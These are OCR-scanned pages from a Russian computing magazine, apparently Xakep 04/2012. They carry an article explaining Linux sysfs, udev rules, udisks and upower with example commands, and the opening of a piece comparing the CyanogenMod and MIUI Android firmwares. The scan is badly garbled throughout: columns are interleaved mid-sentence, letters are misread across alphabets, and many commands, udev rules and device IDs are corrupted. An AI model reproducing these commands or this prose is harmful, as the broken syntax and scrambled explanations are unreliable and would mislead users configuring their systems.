www.epidemz.net

t t t


Звень я од н ой ц е пи

ali as alias alias alias alias alias alias a l ias alias alias alias alias alias alias alias alias alias alias alias alias alias alias ~ lias

pci:v0000 1022d*sv*sd*bc04sc03i 00* sп d_hda_in te l pci:v00001002d*SV*Sd*bc04s c03i 00* snd_hda_i nte l pci :v0000 15ROd00001 977sV*Sd*bC*SC*i* snd_ hda_int e l pci :v00 0 0 1 7 F З d 000030 1 0sv*s d *bC*SC*i* snd_ hda _i ntel pci :v0000 1102d00000009SV*Sd*bC*SC*i* snd_hda_intel pci :v00006549d000 01200sV*Sd*bC*SC*i* snd_hda_intel pci :v0000100Ed*sv*sd*bc04sc03i00* snd _hda_intel pci:v000010B9 d 000054Бlsv*S d *bC*SC*i* snd_hda_intel pci:v00001039d00007502sv*sd*bC*SC*i* snd_hda_intel pci :v000 0 1 1 0Бd 0 0 00 3288sv*sd*bc*sc*i* snd_hda_ intel pci:v00001002d0000RR48sV*Sd*bC*SC*i* snd_hda_intel pci:v00001002d0000RR40sv*sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR38sv*sd*bc*SC*i* snd_hda_inte l pci :v00001002d0000RR30sV*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR28sv*sd*bc*sC*i* snd_hda_intel pci :v00001002d0000RR20sV*Sd*bC*iC*i* snd_hda_intel pci :v00001002d0000RR18sv*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR10sv*sd*bC*SC*i* snd_hda_intel pci:v00001002d0000RR08sv*sd*bc*SC*i* snd_hda_intel pci :v00001002d0000RR00sv*sd*bc*sc*i* snd_hda_intel pci:v0000 1002d0000970FSV*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000960Fsv*sd*bc*sc*i* snd_hda_i ntel pci :v00001 002d00007919sv*sd*bC*SC*i* snd hda intel

/sys/class/ -

по

к л ассам.

В /sys/device можно найти любое устройство, известное ядру, однако для удобства предусмотрены еще три мета-каталога, ко­ торые группируют устройства различными способами. Обращаясь

к файлам внутри них, ты так или иначе попадешь в нужное дерево

1

sys/devices по символической ссылке. Также sysfs предлагает не­ сколько с пециальных каталогов для сервисных нужд:

зак р ы тые файл ы

/sys/firmware/ -

fi rmwa r e,

нуж ны е для

ра бо т ы

некоторых уст р ойс т в;

/sys/fs/ -

FUSE

у п равле н ие фай л овыми

(на п р и мер

интерфейс

(профи л ирование, каталогу на

деба г

и

каждый

ос н ова нными

на

н изкоуров н евого у пр ав л е ни я

ядром

т ак далее);

все модули,

/ sys/modul e/ -

сис т емами,

и ФС);

ext4

/ sys/ k ern el / -

загруженные я д ром,

(обыч н о есть п од катало г

- по par ameters ,

позволяющий у п равлять о пци ями модуля);

/s ys / power / -

'1 Ч а сть фа й ла

груп п ировка устройс т в

ко нт роль

п а р аме т ров э н ерго п от ребле н и я.

С наскоку разобраться в дереве каталогов sysfs проблематично. Но делать этого и не требуется,- файловая система никогда не

modul es. al ias

была предназ начена для ковыряния руками, поэтому мы перехо­ дим к обсужде нию инструментов, к ото рые наиболее полно исполь­

В определенный момент для отладки всего этого хоэяйства

зую т ее возможности.

была реализована виртуальная файловая система ddfs IDevice Dгiveгs Fi leSystem], которая позволяла представить все отношения

IПDIJ

Зачем же нужна

К-объектов в виде дерева каталогов и файлов. Позднее файловую

sysfs, если ее нельзя потрогать, что называется,

систему переименовали в sysfs, и она стала неотъемлемой частью

голым и руками? В се дело в приложениях пространства пользова­

модели драйверов Linux. Что же дает sysfs операционной системе?

теля. В Liпux никогда не существовало единого механизма управ­

Так как

ления оборудованием, который могли бы использовать приложе­

sysfs является визуальным представл ением связи всех

К-объектов ядра, а К-объекты- представлени ем оборудования,

ния, работающие вне ядра. Какую-то информацию можно было

установленного в компе, то мы получаем своего рода вход в святая

полу чить с помощью pгocfs, другую- с помощью iосt l -вызовов

свя тых операционной системы. Например, мы можем проследить,

к файла м устройств, третью - напрямую из памяти ядра !так де­

как устройства объединены с помощью шин , на каком SАТА-порту

лает dmidecode]. Н о е диного интерфейса, который бы выдавал всю

висит жесткий диск, определить его производителя, модель,

под ноготную ком па, не было. И sysfs стала просто спасением для

характе ристики и даже изменить параметры работы. Собственно,

разр аботчиковсофтаи дистрибутивов: они получили инструмент,

почти все, что ядро знает про устройство и может с ним проделать,

с помо щью которого можно производить автоконфигурирование

можно узнать !и выполнить] с помощью чтения и записи файлов.

ОС. адекватно реагировать на горячее подключение устройств и соб ытия plug and play.

Приведу пример. Выполни следующую команду:

Первой разработкой, которая начала использовать sysfs на всю катушку, стал демон ud ev, предназначенный для автоматическо­

$ cat /sys/class/ net /eth0/add r ess

го соз дания файлов устройств в каталоге /dev при подключении к компу нового устройства.

На экран будет выдан МАС-адрес сетевой карты ethO. Прочитав такую информацию, как скорость интерфейса , поддержку режима

ние USВ-принтера или отключение мышки. Вместе с информацией

дуплекса и многое другое.

Команда

Udev подключается к ядру с помощью

netliпk-coкeтa, по которому получает извещения !так называемые uevent] о происходящих в системе событиях, таких как подключе ­

другие файлы каталога /sys/class/net/ethO, ты сможешь выяснить

о соб ытии, а также данными о самом устройстве, демон получает

cat /sys/ Ьl ock/s d a/s i ze выведет на экран размер

путь к каталогу внутри

диска sda, представленный в 512-байтных блоках.

sysfs, представляющему подключенное

уст ройство. На основе данных, полученных из sysfs, и написанных

А команда

заранее правил демон создает файл устройства внутри /dev, давая

# ec ho pe r formance > /sys/devices/system/cpu/cpu0/cpufreq/sca l ing_gove rn or переведет первое ядро процессара !или все сразу, если про­ цессор не поддерживает раздельное управление] в режим макси­ маль ной производительности. Кроме демонстрации возможност ей

sysfs, эти примеры показывают еще одну особенность файловой с истемы. Обрати внимание, что в качестве nервого элемента пути используются разные по сути имена каталогов: class, Ыосk, devices. Но это не бардак в головах разработчиков, а фича фай­ ловой системы. Дело в том, что добраться до любого устройства с помощью sysfs можно несколькими путями:

> cd /sy s/c l ass/ ata_dev ice/ dma / ata_I in k/ dmi 1 a ta_por tl drm/ firmware / back 1ight/ bd i/ gp i o/ Ыосk / graph ics / bsg / hidraw/ > cd / s ys/c lass /scsi_dis k/ > Is В :В :В :В ll:B:B :B S :B:B:B > cd В : В \ :В\: В \: В

ХАКЕР

в ядре;

scsi _d is k/

vc/

pci_bus /

scsi_host/

vi dea4 1 inux /

раwег _supply /

souпd/

vt conso le/

regu latar 1 rfki 11 / rtc / scsi_device /

sp i _masteг 1 thermal/ tt y/ usЫ

В \:В\:В\: В

а ll ow_гestart

в ид ит ядро;

те т !

misc/

net/

ba sh : cd: е: е : е : В : В : Нет такага Ф ё!Оnв uлu каталага

> cd > ls

арр_ tag_own

/sys/device / - де р ево уст р ойств так, как его / sys/Ьlock/ - бл о чны е уст р ойств а ; / sys/bus / - п еречень ш ин, заре ги с т р и рова нн ых

hwmon/ i2c-adapte r / ieeeBB211 / input/ leds /

~ a~he_typ e

de v i се FUR manage_staгt_stap

Х о ж дение по

is i on i ng_mode

р аwег

ргоv

i on_made pгatect i an _ t ype

subsys t em

p гa t ec t

sysfs мо же т з дорово

thin _p гa vi sion

ue vent

ing

з апутать

107

04 /159/2012

www.epidemz.net


UNIXOID KERHEL[?49?, 138282] ~dd / devi ces/ pc IBBBB: В В / ВВ В В : В В: 12 . 2/ usbl / 1- 4/ 1-4 : l .B/host 12/ t arge t 12 : В : В /1 2 :8 : В: B/ scs l _de v lce / 12 : В :8 : В ( sc s i_devic:e ) UOEV C?ll97. 138596] edd / de vl ces/ pc iBBBB: В В / ВВ В В : В В: 12 , 2/ usb l/ 1-4 / 1- ll : l . B/hos t l21terge t 12 : В : е

ls csl )

UOEV [ 7497. 138748 ] add В / 12 : В : В: В <sc:s i)

/ devi c:es / pc iBBBa : B BIIШBB: ВВ : 12 . 2 / usЫ / 1 - 4 / 1 -4 : 1 . B/host 12 / t aгget 12 : В:

UOE V {7497. 1311541 edd / devices / pc IBBBa : В В / В ВВ В : В В: 12 , 2/ usbl / 1- 4/ 1-4 : 1 . B/ host 12 / t erget 12 : В: B I1 2 : B : B : 0 / sc:s l _ d l s kЛ2 : B : В :В (scs l_d ls k:} KERHEL [7497. 1312 В ЭJ add / devices/ pc: i B tШa : ВВ /ВВ ВВ : В В: 12 . 2 / usЫ / 1 - 4 / 1-4 : 1, B/ host 12/ t aгge t l2 : В : B/ 12 :B:B: B/ bsg/ 12 :B:B: B (bsg) UOEV [7497 . l3ld52J edd / de vic es / p~: iBBBB : В В/8888 :88: 12. 2 / usЫ / 1 - .:1 / 1 - 4: 1 . 8/ host 1 2 / t !! гge t 12 : В: 8 / 12 : В : В : B / s~:s l_de v l c e / 12 : В: В : В 1scs i _dev i c e J UDEV [7497. 1326691 add / dev i ce s / pc i888B: 88/8888 :88: 12 . 2 / usЬl / 1- 4/ l-4: 1 , 8 / host 12 / t a г ge t 1 2 :8: 8 / 12 :8 :8: 8 / bsg / 12 :8 :8 :8 (bs g ) KEii!NEL[7497 . I'З2974J !!dd / de vic es / vi гtu e l / bd 1/ 8 :32 lbdi J UDEV [7497 .133159) e dd / de v ic e s /vi гtue l/ bdl / 8 :32 ( bd il KER NEL [7497 . 1333 121 e dd / de v ices/ pc i 888B : ВВ / ВВВВ :88 : 12 . 2 / usЫ / 1-4 / 1-4 : 1 . 8 /hos t 12 / taгge t 12 :8 : B / 12 : 8 : 8 : 8 /Ьlock / sdc

t Ы ock J

KE!<!NEL[7497 .1 357 181 ch!!nge 8 /1 2 : 8 : 8 : 8 /Ьlock / sdc

/ devi ces/ pc IBBBB:88/ 8888: ВВ : 12 , 2/usb1/ l - 4/ 1-4 : 1 . 8 / hos t: l2/terge t 12 : В:

I Ыock l

UDEV [7497 . 293648] add

/ devi ces/ pc i 8B8B :8ai8B88 : 88 : 12 . 2/usb l/ 1-4 / 1-4 : 1 B/hos t 12 / t arge t 12 : В :

8 /1 2 : 8 : 8:8 / Ьl oc k / sdc I Ыock l

UDEV {7497. 312889] chenge B /1 2 : 8 : 8 : 8 / Ыoc k/ s dc

Команда

«Udevadm

/ devl c e s / pc i BBBa : 88 / ВВВВ : ВВ: 12 . 2/ usb 1/ l - 4 /1-4 : 1 8 /host 12 / t e гge t l 2 :8 :

.

I Ыock J

monitor> ~ позволяет просмотр е ть события

udev в

р еж им е ре ального

> ud i sks

/ dev/s da

--s ho~o~-ln fo

Sho~o~tng

tn fo г me t lon ne t 1ve - p!lt h : c k/ s de devl ce : dev ice- fl le : presentet ton : by-id : by-id : by- !d : by- pe th : detected a t : sys t em l nt eгnel :

fог / oгg / fr ee d e sk t op /U D

1sks / devi ces/ sde / sys / devices / pc IBBBB: ВВ / ВВВВ: ВВ : 11 . B /hos t B / t a гget B : В : В /В : В : В

: 8 /Ь

lo

/ de v/ sde / de v/ sd!! / de v / d i sk / Ьу- 1 d/ et e-ST92583 15AS_6VC449FS / dev / d i sk / by- i d/scs 1-SATA_ST92583 15AS_6VC449FS / de v /d i з k / Ьу - 1 d / ~~.~~.&Л - 8х588 8с5ВВ22Б d 39бd /de v/ dl sk / by - path / pc 1-8888 : ВВ : 11. B- scs i - В : В : В : В Ч т . 82 ФеВр. 2В 1 2 28 :48:29 1

гe mov eble:

в

ho!ls med i e: det e cts chenge : detectlon Ьу po lli ng : det e ct l on ln hib tt aЬl e : det e c t ion inh lblted : l s г еаd on ly : l s moun t ed : mount pe t hs : mount ed Ьу u ld:

1 l detected a t

Ч т.

В2 Фе Вр .

2В 12

28 :48 :291

в в в в в в

Рез ул ьтат выполнения команды « udisks -- show- info /dev/sda »

вр е мени

ему нужные права и назначая minoг/majoг-нoмepa.

и им е нно поэтому ты можешь не заботиться о самос т оятельном

Кроме различных низкоуровневых файлов , описывающих

устройство [например, vendo г- производитель ,

mode l - модель

устройства! , в sysfs есть и еще один очень важ н ы й файл moda li as, содержащий строку вида

000010B8bc02sc00i00".

"pci:v000010ECd00 00 8139sv00001734sd

Это уникальный идентификатор у с трой­

с тва, который используется

udev для

загр у зки н у жного мод уля

з апуске нужных приложений. При подключении веб-камеры на э кране сразу появляется окно менеджера фо т ографий, а при подключении принтера происходит его автоконфигурирование. Каждая среда использует свой набор приложений и сервисов для вз а имодействия с исп о л ьзу ют все,- э то

udev, но есть два udi sks и up owe г.

инструмента , которые

устройства . Он генерируется во время сборки ядра на о с нове к о да драйв е ров , каждый из которых с о держит с пи с ок ид е нтификат о ров

поддерживаемых устройств. Этот с писок сохраняе тс я в ф а йл /l iЬ/ modu les/ B ЕРСИ Я _ Я Д РА / mоdu les.alias, описывающ ий п се в д ои мена модулей для команды modpгobe. Все что остается с делать

udev

для з агру з ки нужного драйвера, это выполнить команд у modpгobe с аргументом в виде содержимого файла

modalias

устройства. Ты

можешь попробовать сде л ать это сам:

И UPOWER udisks и upoweг

UDISKS Де м о н ы

представляют собой менеджеры дисков

и пит а ния соответственно. Изначально они были частью проекта

Devic eK it, но к о гда многие компоненты последнего были перене­ udev, стали отд е льными проектами. Оба демона исполь­ зую т ud ev, sysfs и d-bus для получения информации о железе, сен ы в

н от ификаций о подключении дисков или изменении режима п и т ан и я и отправки этой информации вовне.

П е н а чалу м о жет показаться с транным, что при наличии

# modp robe pci:v000010ECd . ..

зна ющ е м о железе в с е, и Одно из самых важных качеств прошлей реализации

devfs,

udev,

отличающи х ег о о т

работающей внутри ядр а, сос тоит

udev,

sysfs,

информирующем о «железных

соб ы т ия х>> весь остальной мир, нужны еще какие -то внешние и н струме нты. На самом же деле существование

udisks

и upoweг

в том, что он позволяет пользова т елю контр о лир о вать процесс

дейст в ите льно важно, так как это не просто очередные н оти-

со здания файлов в каталоге /dev, а также з ап у скать ра з личные

фи катар ы , а полноценные менеджеры.

приложения на основе тех или иных параметров устрой с тва,

изве щ ен ия системы о подключении новых дисков [что и так без

полученных от

него дел ает udevl имеет встроенный интерфейс управления:

sysfs.

Такая особенность позволяет делать очень

Udisks,

например, кроме

интере с ные вещи,- например, назначать своей личной флешке

по запросу др у гого приложения он может выдать подробную

уникальное имя внутри /dev или запускать приложение син­

инфо рмацию о на к опителе, его разметке, смонтирова т ь/раз­

хронизации файлов, если в систему была воткнута цифровая

мо н т ир ов ать разделы, выполнить низкоуровневые операции над

камера. Все это делае т с я с п омощью udеv-правил. Системные

уст р о й ст вом, остановить шпиндель и так далее. Ч тобы проде­

правила хранятся в ката л о г е /liЬ/udev/гules.d, а для пользовате­

ла т ь э ти действия самостоятельно, приложению пришлось бы

лей и администра т оров предусмотрен каталог /etc/udev/гu l es.d.

им е ть права гооt на запись файлов в

Позже мы рассмотрим несколько примеров использования этого

же о н о м о жет прост о подключиться к

каталога.

у

Чтобы информировать другие службы об изменении кон­ фигурации устройств и подключении новых , шину

d-bus.

udev

использ у ет

Любое приложение, имеющее соответствующие

права, пр е до с тавленные тулкитом

Pol ic yKit,

може т п о дклю­

Pol icy Kit

sysfs и d-bus,

монтирование, здесь запросить права

и слать запросы. Немаловажно также, что

udisks

уме­

ет вы п о лн я ть поллинг устройств[например , для обнаружения ком п акт -диск а в привод е l, на чт о н е способен udev. Д е м он

ud isks

с набж е н у тилитой про с тран с тва пользователя ,

с п о м о щью которой можн о выполнить многие действия над на­

читься к шине с целью получения ув е домлений и вы п олнения

к опите лями. Например , чт об ы просм о треть подробную инфор­

о т ветных д е й с твий. Так делает любая ср е да рабочег о стола ,

ма ци ю обо вс ех ди с ка х с и с т е мы , можно выполнить следующую ко м а нд у :

$ udisks -- dum p

ЧТОБЫ ИНФОРМИРОВАТЬ

Для получения информации о конкр етном накопителе , включая

ДРУГИЕ СЛУЖБЫ ОБ ИЗМЕНЕНИИ

КОНФИГУРАЦИИ УСТРОЙСТВ И ПОДКЛЮЧЕНИИ НОВЫХ, ИСПОЛЬЗУЕТ ШИНУ

D-BUS

UDEV

м о д е ль , х арактери с тики и информацию

SMART:

$ udisks --show-info / dev / sda Дл я и з вл е ч е ния ди ска:

$ udisks --eject / dev/cdrom

ХАКЕР

108

www.epidemz.net

04/159/20 12


Зве н ья од н ой це п и

Export kernel

Kernel

object ~

(Ko bj ects)

Sysfs /sys ······························································ - fol ders are kobjects (ke rnel objects)

..

-

- files are object attributes - file content ls attribLite vaiLie

Driver core •.................. netlink

Uev ent

. . ... ~~~!!~~ .....

Gather info rm ation from sysfs

Udevd ............................................................. - remove duplicate uevents - ensure right u event order

Udev devic e create

.···························································.

-

collect i11formation from sysfs create device files add symllnks to devices in j d ev set permissions to devices

Pass uevents to udev

Get stored device information

1

Udev ev ent process ...............................................................................................

1

Udev database in memory

f

· - parse rules ln /etc/udevtrules .d/ and store in memory · - match uevent agalnst udev rules (identify device) - store device info rma tion to udev database

Store device informatlon

~ :...:. ~?. ~.~..~~ 9. ~~..~.?~ .~.~~~. ~ .~ :.i.~~:.~~..~?.~. ~ ~ ~ ~~.~.~........................: f..[)'В' ~~ё·~·~·~·~·~ t·i·~·~· . ) ~

lnstance

~

: ..............'/\ ...............

Notify userspace about devlce 1 Notify all other (interested ln dev ice) applica t ions

~

~.............

.............. ........ ...... Socke t .............. . DBusConnection ~ ~ DBusConnection lnstance lnstance · ··· ·· · · ··~ · ···· · ·· ·· ······

Socket

········ · · ·· · · ·~ · · ·· ··· · · ·

4;,:............................................. . . . . ~~~·~~~~·d;;~;t~~~; ..··u :

,."., ..,.,., .,~ ,.,

r:-:-:' .,:-:...,." ..

.. u{-,..,,." .,,.,.,.,.,.,.,.,., .,:-:.. ,." .. .,.--- - - - ,

DBu sConnection ~ lnstance

................................ Appl ication

ХХХ

DBus daemon p rocess Ар х ите к тура

udev к ак он а есть

Для установки таймаута на остановку диска:

н ость, связанную с управлением питанием. Он занимается тем, что следит за состоянием питания устройств, может уnравлять

$ udisk s --set-spindown / dev/s da --s pindown -t imeout

СЕКУНДЫ

режимами энергосбережения различ ны х ком п онентов ПК и и з­

вещать систему о таких событиях, как п ерехо д на использование И, кстати говоря, все эт и дей ствия не nотребуют прав гооt. Со­

аккумулятора и сильный нагрев винчестера или видеокарты.

вре м е нны е DE уже пер е шли на ис п ользование udisks в качестве

Пока он находится в начальной стадии разработки, поэтому

менеджера накопителей и и спользую т его даж е в утилитах раз­

лишь немногие дистрибутивы задействуют его возможности,

метки дисков. Также есть несколько проектов создания ле г ковес­

предпо чит ая использовать

ных демонов автомо н тиров ания, например

devmon. Пр осто уста ­ нови udisks и devmon, а затем д обавь в конец файла -/.xsession строку !заменив fluxbox на свой менеджер окон!:

udev, sysfs и ACPI.

Как и udisks, upower имеет утилиту управления, однако един­ ственное, что можно получить от нее на данном этапе развития, это сводку о состоянии питания различных компонентов машины.

Сделать это можно с помощью команды «upower --dump». ехес

ck-lau nch-se ss io n bas h

"devmon & flux box"

iiit•'t•o

Так ди ски будут м о нтировать ся автоматически.

Вернемся к sysfs и udisks и посмотрим, какие интересные вещи

Д емон upoweг предоставляет аналогичную функциональ-

ХАКЕР

можно сделать с их помощью. Н ачнем с sysfs:

04/1 59/ 2012

109

www.epidemz.net


UNIXOID 1.

Получение статистики использования сетевых интерфейсов :

$ gr ep -r . /sys/c l ass/ net /et he/s t at ist i cs 2. Ин формирование системы ото м , чтодиск не является меха н и­ ческим [позволяет сдела т ь ввод-вывод при ис п ользовании SS D чуточку быстрее!:

# ec ho

е

>

/sys/ Ьl ock/sd b /que u e/rot ational

updeted : hes histoгy : has stat ist ics : bat tе г у p г esent : rechargeab l е: s t ate :

Если ты хочешь

yes Thu Feb yes yes

2 17 :53: 26 2012 IB seconds ago )

са мостоятельно

разобраться во внутренностях

sysfs,

советую начать

yes yes

с каталога /sys/c lass, который сортирует

fully-chaгged

eneгgy:

~~

. 7108

eneгgy-empty:

0

~h

eneгgy-ful l :

~5.~767 ~h

устройства в более

~h

удоб ном для понимания виде.

eneгgy-ful l -design: ~8.8~ ~h

3. Принудительный рее ка н SСSI-устройств [например для добавле­ ния на лету новых разделов в виртуальной машине!:

0

vo l tage :

12.38 V 98.31587. 93.11367. l i th ium-i on

peгcentage: сарае

i ty: technalagy:

~

устройства есть файл

0 . ввв

содержа щий имя

majoг/minoг-нoмepa.

unknowп

Он используется

( геtе ):

1328183606

0 . В0В

sysfs uevent,

устройства и его

lcha гge ):

1328183606 Histoгy

Получение информации о питании каждого USВ-порта:

В каждом каталоге

ene г gy-гate :

Histoгy

# echo "- - -" > /sys/class/scsi_hos "lo/ hoste/scan

4.

ASUS K5BAF

v endoг :

model: power supply:

udev для

unknown

создания

файлов устройств во время загрузки.

$ f or i in ' find /sy s/ devi ces/*/*/ usb* \ -na me l eve l ' ; do echo -n "$i : "; cat $i ; done

Результат выполнения коман ды

«Upo wer

--dump н

разделы флешки в каталог /mnt. П ри выдергивании происходит

5.

Информация о компе [производитель, материнская плата и так

размонтирование.

далее!:

2. Синхронизация файлов: # ca t /sys/ dev i ces/virtual/d mi /id/*

ACT I ON== "add" , KERN EL== "sd</a-z><a-z><8-9>" , ENV{ IO_USB_DR I VER }= "usb -s torage" , RUN+= " / bin /c p -а / mnt /%k / backup/%k"

6. Температура процессора: # ca t

/sys/c l ass/ hwmon / hwmo ne / t em pl_ in pu t Это правило позволяет синхронизировать содержимое флешки

7. У п равление яркостью экрана [ макси м альная яркость прописана в /sys/class/backl ig ht/acpi_vi deoO/ma х_Ь гig htпessl:

с каталогом файловой системы [в данном случае /Ьасkuр/имя_ устройс тва! с помощью обычного ер. Е го следует поместить перед послед ней с т рокой предыдущего набора правил.

# ec ho 8 > /sys/c lass / backligh t/ acpi_videoe;bri ghtness

3. Назначение статичных имен сетевым картам: 8. П еревод системы в спящий реж и м [вместо mem можно использо­ вать d isk для гибернации ! :

SUBSYSTE M= ="net" , ATTR {address}== "aa:bb:cc:dd:ee:ff" , NAME= " lane " SUBSYSTEM== "net" , ATTR {address}== "ff:ee:dd : cc:bb:aa" , NAME= "wlane"

# ec ho mem > /sys/ power/s t ate Это только малая часть того, что можно сделать, используя

sysfs. В любом случае, лучше самостоятельно покопаться в недрах

Правила проверя ют МАС-адрес устройства и на его основе на­

значают имя. Строка ATTR{addгess} позволяет получить содержи­

файловой системы с помощью файлового менеджера.

Те п ерь по г овор и м об udev. Д емон udev имеет систему пра­

мое файла addre5s внутри каталога устройства в sy5fs.

вил, которые оп и сы в аю т то, ка к он именует создаваемые фай л ы устройс т в, какие пр а ва и м назначает и что делает после созда­

4. Автоматическое отключение тачпада при подключении мыши:

ния. Правила имеют прос т ой формат и помещаются в файлы вну­

три кaтaлoгoв/liЬ/udev/гules.d [системный! или /etc/udev/гules.d. По соглашению все файлы правил имеют префикс в виде цифры,

который опре д еляет поря д ок их загрузки. Мы назовем свой файл

/etc/udev/гules.d/99-custom.гules . Что в него можно помести т ь?

1. Автомонтирование:

ACТION == "a dd " ,

SUBSYSTEM== "input" , KERNEL== " mouse[l-9]" , ENV{ DI SPLAY} =":e.e· , ENV{XAU THO R IТY}= "/ home / USERNAМE / .Xauthority" ,

ENV{ID_CLASS}= "mouse " , RUN+= "/usr/Ьin/synclient TouchpadOff=l" ACTION== "remove " , SUBSYSTEM== "input" , KERNEL == "mouse[l-9]" , ENV{DISPLAY}= ":e.e" , E NV{XAU THO RПY}= " / home / USERNAМE / .Xauthority" ,

AC TION == "add" , KERNEL== "sd<a-z><8-9>" , ENV{IO_USB_ORIVER}= "usb-storage" , RUN+="/bin/mkdir -р /mnt/%k " ACTION == " add " , KERNEL== "sd</a-z><a-z><8-9>" , ENV { IO_USB_DRIVER} ="usb-storage" , RUN+="/bin/mount -о rw,noexec,dmask=eee,fmask=lll,utf8 / dev/%k /mnt/%k " ACTION== "remove" , KERNEL= =" sdc/a-z><a-z >< 8-9 >" , ENV { IO_USB_DRIVER}= " usb-storage " , RUN+=" / bin / umount /mnt/%k "

ENV{ ID_CLASS }= "mouse" , RUN+= "/usr/Ьin/ synclient TouchpadOff=e" Правила используют утилиту sy п client для отключе ния тач п ада,

если в систему воткнуто устройство с и м енем ти п а /dev/mouseO,

/dev/mo usel и так далее.

l:l§!:r.J!t§i Файловая система sysfs не только позволила Linux сделать

большой шаг вперед на пути к интеллектуальному деск т опу, способному к самоконфигурированию, но и дала гикам отличный инструмент для управления оборудованием. В э т ой статье мы рас­

Э т а самый простой вариант автомонтирования, который работа ­

смотрели лишь часть возможностей комплекса

sysfs+udev+udisks.

ет то л ько в от н ошении US В- фле ш ек. П равила п роверя ют устрой­

Вероятно, ты сможешь nридумать и более изощрен н ые способы

ство на прина д леж н ос т ь к классу USB Mass Stoгage и мо н тируют

его испол ь зования.

I

ХАКЕР

110

www.epidemz.net

04/159/2012


UNIXOID

Евгений Зобнин (execЬit.rul

ЗЕЛЕНЫХ РОБОТОВ ~

.-

-

~

... -

. _,

ВЫБИРАЕМ АЛЬТЕРНАТИВНУЮ ANDROID-ПPOШИBKY: CYANOGENMOD VS Какую альтернативную прошивку

ПРЕДИСЛОВИЕ Cyanogen Mod

MIUI

nочти с момента nояв л ения nерво г о смартфона

Andгoid выбрать для установки

С т рого говоря,

на свой девайс? Наверняка ты

оnерационной системы Andгoid. Каждый из них

Cyanogen [насто ящее имя - Ст ив Кондик, не так

вкл юч ает в себя ог ромное количество измене­

давно о н начал работать в комnании Samsungl,

не раз задавался этим вопросом .

Существует множество самы х разнообразны х прошивок для сотен устройств, однако среди

и

MIUI

не альтер­

нативные nрошивки, а самые на стоящие форки

ний , ко торые из-за nолитики

Google

никогда не

JesusFгeke. Изначально

развиваются большой командой разработчиков,

ставлял собой nр ос т ую модификацию ори г и ­ нального Andгoid, ус тановленного насмартфон

T-Mobi le G1 [Andгoid 1.5/. Однако nозднее, nосле nрисоединения к Cya nogen других разработчи­

[наnример, существует nорт Cyan ogen Mod на

они получили столь широкое

Оп е, - дума ю, о нем

ков и откры т ия ко д а оnера ц ио н ной системы,

большинство читате л ей вряд ли с лышали!.

она nревратилась в настоя щ и й форк, сборка

Geeksphone

Какую nрошивку выбрать для своего апnарата

которого осуществлялась из собственно г о реnо­

-решай сам, я же nомогу тебе оnределиться,

зитария исходных текстов, вклю ч ающе г о в себя

рассказав о возможностях и тонк ост ях работы

множество nоnравок в оригинальные исходни­

с каждой из них.

ки , оnубликованные

ХАКЕР

отвечают

десятки разработчиков с о всего мира, а база

загрузить и х на свой девайс,­ сейчас .

Go ogle. Cyanogen Mod

Сегодня за развитие

распространение, и как

обо всем этом ты узнаешь прямо

nред­

разнообразные и экзо тические устройс тв а с мартфон

CyanogenMod и MIUI. В чем

CyanogenMod

которые выnолняю т nорты nроши вки на сам ые

настоящих бриллиантов только

и х преимущества, почему

который взял за осно ву nрошивку, создан н ую

nоnадут в официальную версию ОС. Оба nроек та

всего этого разнообразия

два:

nод уnравлен ием Andгo i d. Ее создал энтузиаст с xda-developeгs, скрывающийся nо д ником

о фициально nоддерживаемых устройств вклю­ чает в себя

56

моделей с мартфонов и nланше­

Итак, CyanogenMod [cyanogenmod .com l. На­

т о в , среди которых есть как тоnавые девайсы

верное, самая nоnулярная nрошивка Andгoid

тиnа

из всех существующих. Ведет свою историю

жетные устройства вро д е Н ТС

Google Nexus S и

Н ТС lncгediЫe, так и бюд­

Tattoo

и

Huawei

111

04/159/2012

www.epidemz.net


UNIXOID \!!

"

Fl!fflleMJJI

1

olll (iil (•) 19 57

'':'1 -

выполнять опасные для пол ь зователя функ ­

'-

ции [например, отправлят ь С М С]. Встроенный клиент О репV РN , имею щ ий

662

графический интерфейсдля настройки.

Он

Д оработки в камере [например, фу н кция

tap-to-focus ], номеронабирателе и СМС­ приложении.

2"

3 '

4"

5"'

б ~-. .

7

8 1 Цl

9 w~

9

#

*

Ok ,р

У правля ем при в илегиями

Настройки производитель­

nрило же ния в

ности в

CyanogenMod

iiiKiit•l=ltt!i

Впечатляет, не правда л и? Теперь попробуем

@

Номеронабират е ль и СМС-nрилож е ни е

с март. Что для это г о нужно ? Все то же самое,

что и для установки любой другой прошивки:

MIUI

гооt-доступ, кастомная консоль восстанов л ения

CyanogenMod

[гесоvегуl, сама прошивка и набор закрытых и

Неофициальные версии прошивки для

U8220.

прямоввыпадающейпанелиуведо м лений.

уста н овить это чудо инженерной мысли на свой

.s>..

Гд•

Кнопкиуправленияфункциямисмартфона

десятков других моделей м ожно найти на фору-

ssh,

при подключении с помощью

Gооglе-приложе н ий [ М аркет, Gmail и прочие ] .

кото ры е позволяют комфортно работать

SSH

или

Получив гооt, мы сможем изменить Ьооt-раздел

adb.

xda-developers .com . П оследняя стабильная версия прошивки имеет номер 7.1.0 и основана на коде Andгoid 2.3.7. Также ведется работа

Для запуска SSH-cepвepa можно использо­

внутренней NА N О-памяти, что по зво лит за­

вать графический интерфейс.

писать в него модифицированную консоль

Меню настроек существенно расширено

восстановления [которая, в отл и чие от штатной,

над девятой версией прошивки, базирующей-

и включает в себя множество пунктов для

с п особна уста на вливать прошивки без цифро­

ся на коде Android 4.0.3 [предполагалась, что

тонкоготюнинга ОС.

вой подписи производите л я аппарат а].

версия

П оддержкатем,разработанныхком п анией

мах

8.0

будет основана на Andгoid

в связи с отказом

Google

3.0,

но

выкладывать ее код

П о умолчанию в And г oid поль зователь гооt не

Т- Mobile. Темы устанавливаются с помощью

имеет пароля, но получить его права невозмож­

в свободный доступ образовался разрыв между

Android

версиями]. Несмотря на сырость CyanogenMod

В состав прошивки включена поддержка

логина [/b in/loginl или изменения UID 1/Ьin/su] .

формата

П оэтому систему необходимо поломать с помо­

9,

в Сети уже можно найти множество ее сборок

Maгk et.

но из-за отсутствия в системе ин струментов для

FLAC.

Доработан н ое меню перезагрузки, с помо­

для различных устройств.

отличия и возможности Чем же так хорош Cyanogen Mod, почему он

за­

Вручную делать это совсем не обязательно:

прямо в консоль восстановления.

для Andгoid можно воспользова т ься прило ­

П оддержка

жением zгoot [goo.gl/mp6wg ], а в Windows или

Wi-Fi, Bluetooth

и USВ-тизеринга

